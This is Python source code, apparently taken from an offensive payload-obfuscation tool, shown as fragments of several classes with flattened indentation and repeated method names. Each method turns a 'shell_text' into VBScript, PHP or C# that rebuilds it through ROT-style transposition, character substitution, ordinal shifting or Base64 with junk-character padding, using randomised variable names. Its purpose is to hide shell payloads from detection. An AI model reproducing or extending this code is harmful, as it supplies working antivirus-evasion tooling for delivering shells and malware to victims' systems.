def RotPlus(self):
vbSpecialChars = lambda s: s.replace('"', '""').replace(
'\n', '" & chr(10) & "').replace('\t', '" & chr(9) & "')
shell_encoded, rows = Encoders(self.Executable(
self.shell_text)).Rot90()
vals = self.makeVals(shell_encoded)
self.vars = [self.makeVars() for _ in range(4)]
payload = 'dim ' + self.vars[0] + ', ' + self.vars[
1] + ', ' + self.vars[2] + '(' + str(
rows) + '), ' + self.vars[3] + ', i, r \n'
payload += self.vars[1] + ' = ' + str(rows) + ' \n'
payload += self.vars[0] + ' = "" \n'
payload += ''.join([
self.vars[0] + ' = ' + self.vars[0] + ' & "' +
vbSpecialChars(vals[i]) + '" \n' for i in range(len(vals))
])
payload += 'for i = 0 to (len(' + self.vars[0] + ') / ' + self.vars[
1] + ') - 1 \n'
payload += 'for r = 1 to ' + self.vars[1] + ' : '
payload += self.vars[2] + '(r) = ' + self.vars[
2] + '(r) & mid(' + self.vars[0] + ', r + i * ' + self.vars[
1] + ', 1) : next \n'
payload += 'next \n'
payload += self.vars[3] + ' = trim(join(' + self.vars[2] + ', "")) \n'
return payload
def Random(self):
vbSpecialChars = lambda s: s.replace('"', '""').replace(
'\\\\', '\\').replace('\\n', '" & chr(10) & "').replace(
'\\t', '" & chr(9) & "')
shell_encoded, cs1, cs2 = Encoders(self.Executable(
self.shell_text)).Random()
vals = self.makeVals(shell_encoded)
self.vars = [self.makeVars() for _ in range(4)]
payload = 'dim ' + self.vars[0] + ', ' + self.vars[
1] + ', ' + self.vars[2] + ', ' + self.vars[3] + ' \n'
payload += self.vars[3] + ' = "" \n'
payload += self.vars[0] + ' = "" \n'
payload += ''.join([
self.vars[0] + ' = ' + self.vars[0] + ' & "' +
vbSpecialChars(vals[i].encode('unicode-escape')) + '" \n'
for i in range(len(vals))
])
payload += self.vars[1] + ' = "' + vbSpecialChars(
cs2.encode('unicode-escape')) + '" \n'
payload += self.vars[2] + ' = "' + vbSpecialChars(
cs1.encode('unicode-escape')) + '" \n'
payload += 'for i = 1 to len(' + self.vars[0] + ') \n'
payload += 'if instr(1, ' + self.vars[2] + ', mid(' + self.vars[
0] + ', i, 1)) > 0 then '
payload += self.vars[3] + ' = ' + self.vars[3] + ' & mid(' + self.vars[
2] + ', instr(1, ' + self.vars[1] + ', mid(' + self.vars[
0] + ', i, 1)), 1) \n'
payload += 'if instr(1, ' + self.vars[2] + ', mid(' + self.vars[
0] + ', i, 1)) = 0 then '
payload += self.vars[3] + ' = ' + self.vars[3] + ' & mid(' + self.vars[
0] + ', i, 1) \n'
payload += 'next \n'
return payload
def OrdPlus(self):
shell_encoded, ord_plus, chr_join = Encoders(self.shell_text).OrdPlus()
vals = self.makeVals(shell_encoded)
self.vars = ['$' + self.makeVars() for _ in range(3)]
payload = self.vars[2] + ' = ""; \n'
payload += self.vars[0] + ' = ""; \n'
payload += ''.join(
[self.vars[0] + ' .= "' + v + '"; \n' for v in vals])
payload += 'foreach(explode("' + chr_join + '", ' + self.vars[
0] + ') as ' + self.vars[1] + ') '
payload += self.vars[2] + ' .= chr(' + self.vars[1] + ' - ' + str(
ord_plus) + '); \n'
return payload
def Base64(self):
shell_encoded = Encoders(self.shell_text).Base64()
junk = self.makeJunk(shell_encoded, self.an_chars)
vals = self.makeVals(shell_encoded, junk)
self.vars += [self.makeVars() for _ in range(6)]
payload = 'string ' + self.vars[4] + ' = ""; \n'
payload += ''.join([
self.vars[4] + ' += "' + vals[i] + '"; \n'
for i in range(len(vals))
])
payload += 'string ' + self.vars[5] + ' = Encoding.UTF8.GetString('
payload += 'Convert.FromBase64String(' + self.vars[
1] + '.Replace(@"' + junk + '", ""))); \n'
return payload
def OrdPlus(self):
shell_encoded, ord_plus, chr_join = Encoders(self.shell_text).OrdPlus()
vals = self.makeVals(shell_encoded)
self.vars = [self.makeVars() for _ in range(7)]
payload = 'string ' + self.vars[6] + ' = ""; \n'
payload += 'string ' + self.vars[4] + ' = ""; \n'
payload += ''.join([
self.vars[4] + ' += "' + vals[i] + '"; \n'
for i in range(len(vals))
])
payload += 'foreach(string ' + self.vars[5] + ' in ' + self.vars[
4] + '.Split(\'' + chr_join + '\')) { '
payload += self.vars[6] + ' += (char)(Convert.ToInt32(' + self.vars[
5] + ') - ' + str(ord_plus) + '); } \n'
return payload
def Random(self):
clean_str = lambda s: s.encode('unicode-escape').replace(
'"', '\\"').replace("$", "\\$")
shell_encoded, cs1, cs2 = Encoders(self.shell_text).Random()
vals = self.makeVals(shell_encoded)
self.vars = ['$' + self.makeVars() for _ in range(4)]
payload = self.vars[3] + ' = ""; \n'
payload += self.vars[0] + ' = ""; \n'
payload += ''.join(
[self.vars[0] + ' .= "' + clean_str(v) + '"; \n' for v in vals])
payload += self.vars[1] + ' = "' + clean_str(cs1) + '"; \n'
payload += self.vars[2] + ' = "' + clean_str(cs2) + '"; \n'
payload += 'foreach(str_split(' + self.vars[0] + ') as $c) { '
payload += self.vars[3] + ' .= (strpos(' + self.vars[
2] + ', $c) === false) ? $c : '
payload += self.vars[1] + '[strpos(' + self.vars[2] + ', $c)]; } \n'
return payload
def Base64(self):
shell_encoded = Encoders(self.shell_text).Base64()
junk = self.makeJunk(shell_encoded + 'base64_decode', self.an_chars)
vals = self.makeVals(shell_encoded, junk)
self.vars += ['$' + self.makeVars() for _ in range(4)]
b64 = junk.join([c for c in '"base64_decode"'])
payload = self.vars[0] + ' = ""; \n'
payload += ''.join(
[self.vars[0] + ' .= "' + v + '"; \n' for v in vals])
payload += self.vars[
1] + ' = str_replace( "' + junk + '", "", ' + self.vars[
0] + ' ); \n'
payload += self.vars[
2] + ' = str_replace( "' + junk + '", "", ' + b64 + ' ); \n'
payload += self.vars[3] + ' = ' + self.vars[2] + '( ' + self.vars[
1] + ' ); \n'
return payload
def Random(self):
clean_str = lambda s: s.encode('unicode-escape').replace('"', '\\"')
shell_encoded, cs1, cs2 = Encoders(self.shell_text).Random()
vals = self.makeVals(shell_encoded)
self.vars = [self.makeVars() for _ in range(8)]
payload = 'string ' + self.vars[7] + ' = ""; \n'
payload += 'string ' + self.vars[4] + ' = "' + clean_str(cs1) + '"; \n'
payload += 'string ' + self.vars[6] + ' = "' + clean_str(cs2) + '"; \n'
payload += 'string ' + self.vars[5] + ' = ""; \n'
payload += ''.join([
self.vars[5] + ' += "' + clean_str(vals[i]) + '"; \n'
for i in range(len(vals))
])
payload += 'foreach(char c in ' + self.vars[5] + ') { '
payload += self.vars[7] + ' += ' + self.vars[
6] + '.Contains(c.ToString()) ? '
payload += self.vars[4] + '[' + self.vars[6] + '.IndexOf(c)] : c; } \n'
return payload
def OrdPlus(self):
shell_encoded, ord_plus, chr_join = Encoders(
self.Executable(self.shell_text)).OrdPlus()
vals = self.makeVals(shell_encoded)
self.vars = [self.makeVars() for _ in range(3)]
payload = 'dim ' + self.vars[0] + ', ' + self.vars[
1] + ', ' + self.vars[2] + ' \n'
payload += self.vars[2] + ' = "" \n'
payload += self.vars[0] + ' = "" \n'
payload += ''.join([
self.vars[0] + ' = ' + self.vars[0] + ' & "' + vals[i] + '" \n'
for i in range(len(vals))
])
payload += 'for each ' + self.vars[1] + ' in split(' + self.vars[
0] + ', "' + chr_join + '") : '
payload += self.vars[2] + ' = ' + self.vars[2] + ' & chr(' + self.vars[
1] + ' - ' + str(ord_plus) + ') : next \n'
return payload
def Base64(self):
shell_encoded = Encoders(self.Executable(self.shell_text)).Base64()
junk = self.makeJunk(shell_encoded, self.an_chars)
vals = self.makeVals(shell_encoded, junk)
self.vars += [self.makeVars() for _ in range(4)]
payload = 'dim ' + self.vars[0] + ', ' + self.vars[
1] + ', ' + self.vars[2] + ', ' + self.vars[3] + ' \n'
payload += self.vars[0] + ' = "" \n'
payload += ''.join([
self.vars[0] + ' = ' + self.vars[0] + ' & "' + vals[i] + '" \n'
for i in range(len(vals))
])
payload += VBS_B64 + ' \nset ' + self.vars[1] + ' = new Base64 \n'
payload += self.vars[2] + ' = Replace( ' + self.vars[
0] + ', "' + junk + '", "") \n'
payload += self.vars[3] + ' = ' + self.vars[
1] + '.Decode( ' + self.vars[2] + ' ) \n'
return payload
def RotPlus(self):
clean_str = lambda s: s.encode('unicode-escape').replace('"', '\\"')
shell_encoded, rows = Encoders(self.shell_text).Rot90()
vals = self.makeVals(shell_encoded)
self.vars = [self.makeVars() for _ in range(8)]
payload = 'int ' + self.vars[5] + ' = ' + str(rows) + '; \n'
payload += 'string[] ' + self.vars[6] + ' = new string[' + str(
rows) + ']; \n'
payload += 'string ' + self.vars[4] + ' = "" ; \n'
payload += ''.join([
self.vars[4] + ' += "' + clean_str(vals[i]) + '"; \n'
for i in range(len(vals))
])
payload += 'for(int i = 0; i < ' + self.vars[
4] + '.Length / ' + self.vars[5] + '; i++) '
payload += '{ for(int r = 0; r < ' + self.vars[5] + '; r++) '
payload += self.vars[6] + '[r] += ' + self.vars[
4] + '[r + i * ' + self.vars[5] + ']; } \n'
payload += 'string ' + self.vars[
7] + ' = String.Join("", ' + self.vars[6] + ').Trim(); \n'
return payload
def RotPlus(self):
clean_str = lambda s: s.encode('unicode-escape').replace(
'"', '\\"').replace("$", "\\$")
shell_encoded, rows = Encoders(self.shell_text).Rot90()
vals = self.makeVals(shell_encoded)
self.vars = ['$' + self.makeVars() for _ in range(4)]
payload = self.vars[1] + ' = ' + str(rows) + '; \n'
payload += self.vars[2] + ' = array(); \n'
payload += self.vars[0] + ' = "" ; \n'
payload += ''.join(
[self.vars[0] + ' .= "' + clean_str(v) + '"; \n' for v in vals])
payload += 'for($i = 0; $i < ' + self.vars[1] + '; $i++) ' + self.vars[
2] + '[] = ""; \n'
payload += 'for($i = 0; $i < (strlen(' + self.vars[
0] + ') / ' + self.vars[1] + '); $i++) '
payload += '{ for($r = 0; $r < ' + self.vars[1] + '; $r++) '
payload += self.vars[2] + '[$r] .= ' + self.vars[
0] + '[$r + $i * ' + self.vars[1] + ']; } \n'
payload += self.vars[3] + ' = trim(implode("", ' + self.vars[
2] + ')); \n'
return payload